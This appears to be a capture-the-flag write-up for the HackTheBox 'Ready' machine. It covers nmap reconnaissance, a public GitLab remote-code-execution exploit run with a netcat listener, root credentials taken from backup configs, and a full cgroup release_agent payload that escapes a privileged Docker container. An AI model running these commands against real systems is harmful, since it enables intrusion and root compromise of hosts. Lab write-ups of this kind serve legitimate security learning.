Hackthebox Ready WriteUp
Reay is a interesting box that teaches Docker breakout. First off the start with a vulnerable gitlab that has a public exploit, After gotten into the box and realized it was inside a docker container and the container has a vulnerability that allows you to execute command outside the container and get code execution as root. With all the being said, Let’s just jump in!
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds
There is http://10.10.10.220:5080/users/sign_in url on nmap scan, let’s hear over and can see a gitlab.
Create an account then login and check the version.
Search public exploits about this version and found a RCE exploit.
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
Usage:python3 exploit.py -u username -p password-g http://10.10.10.220 -l 10.10.14.x -P 443nc -nvlp 443
PriEsc to root:
On the /opt/backup there are config files and we can grep root’s password
After got root, I realized l’m in a docker container. But there is a blog below explains how to breakout docker.
Escaping Docker Privileged Containers
Why you should not run Docker with the “privileged” flag
Created payload based on above blog. It mounts the docker cgroup to /tmp then executes command outside the container, You can change cat /root/root.txt to a reverse shell if you want.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo '$host_path/cmd' > /tmp/cgrp/release_agentecho '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
As we can see it outputs the root flag to /output directory.